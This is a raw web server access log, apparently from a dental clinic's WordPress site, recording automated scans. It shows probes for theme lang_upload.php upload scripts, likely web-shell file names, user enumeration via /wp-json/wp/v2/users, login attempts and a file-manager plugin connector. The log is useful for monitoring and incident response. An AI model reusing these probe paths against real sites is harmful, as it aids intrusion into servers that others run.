301 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:15 -0400] "GET /wp-content/themes/footysquare/include/lang_upload.php HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:18 -0400] "GET /wp-content/themes/aidreform/include/lang_upload.php HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:22 -0400] "GET /wp-content/themes/statfort/include/lang_upload.php HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:27 -0400] "GET /wp-content/themes/club-theme/include/lang_upload.php HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:32 -0400] "GET /wp-content/themes/kingclub-theme/include/lang_upload.php HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:41 -0400] "GET /wp-content/themes/spikes/include/lang_upload.php HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:45 -0400] "GET /wp-content/themes/spikes-black/include/lang_upload.php HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:46 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:00:48 -0400] "GET /wp-content/themes/soundblast/include/lang_upload.php HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:52 -0400] "GET /wp-content/themes/bolster/include/lang_upload.php HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:00:57 -0400] "GET /wp-content/themes/rocky-theme/include/lang_upload.php HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:02 -0400] "GET /wp-content/themes/bolster-theme/include/lang_upload.php HTTP/1.1" 301 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:03 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:01:07 -0400] "GET /wp-content/themes/theme-deejay/include/lang_upload.php HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:10 -0400] "GET /wp-content/themes/snapture/include/lang_upload.php HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:14 -0400] "GET /wp-content/themes/onelife/include/lang_upload.php HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:20 -0400] "GET /wp-content/themes/churchlife/include/lang_upload.php HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:23 -0400] "GET /install.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:01:31 -0400] "GET /wp-content/themes/soccer-theme/include/lang_upload.php HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:36 -0400] "GET /wp-content/themes/faith-theme/include/lang_upload.php HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:01:42 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:01:45 -0400] "GET /wp-content/themes/statfort-new/include/lang_upload.php HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:02:02 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:02:23 -0400] "GET /mah.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:02:43 -0400] "GET /wp-admin/about.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:03:02 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:03:22 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:03:40 -0400] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:03:57 -0400] "GET /wp-content/install.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:04:14 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 209.38.125.40 - - [12/Aug/2025:16:04:27 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:16:04:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:16:04:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:16:04:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:16:04:29 -0400] "GET /wp-includes/install.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:04:48 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:05:04 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:05:25 -0400] "GET /wp-admin/network/admin.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:05:45 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:06:03 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:16:06:19 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 217.253.150.84 - - [12/Aug/2025:16:06:35 -0400] "GET /wp-json/wp/v2/users HTTP/1.1" 301 254 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:16:06:36 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 146.190.11.185 - - [12/Aug/2025:16:06:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:06:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:16:06:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:16:06:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:16:06:56 -0400] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 289 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 31.13.127.17 - - [12/Aug/2025:16:10:27 -0400] "GET /teeth-aligners/ HTTP/1.1" 301 246 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 149.50.215.205 - - [12/Aug/2025:16:13:08 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:16:13:08 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:16:13:08 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:16:13:08 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:16:14:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:14:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:16:14:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:16:14:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 193.36.224.16 - - [12/Aug/2025:16:16:57 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 272 "http://orthosquare.in/dental-tourism/teeth-implant/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 4.43.184.114 - - [12/Aug/2025:16:19:40 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US) Gecko/20101012 Firefox/3.6.11" 173.252.79.8 - - [12/Aug/2025:16:25:56 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 152.42.157.60 - - [12/Aug/2025:16:26:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:16:26:33 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:16:26:33 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:16:26:33 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 31.13.127.20 - - [12/Aug/2025:16:26:41 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 149.50.215.205 - - [12/Aug/2025:16:26:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:16:26:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:16:26:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:16:26:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:16:28:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:28:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:16:28:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:16:28:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:16:32:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:16:32:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:16:32:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:16:32:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.11.185 - - [12/Aug/2025:16:36:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:36:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:16:36:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:16:36:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 69.63.184.48 - - [12/Aug/2025:16:40:13 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 149.50.215.205 - - [12/Aug/2025:16:41:23 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:16:41:23 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:16:41:23 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:16:41:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:16:44:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:16:44:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:16:44:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:16:44:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:16:48:21 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "python-httpx/0.28.1" 152.42.157.60 - - [12/Aug/2025:16:54:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:16:54:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:16:54:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:16:54:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:16:55:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:16:55:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:16:55:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:16:55:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:16:58:44 -0400] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 299 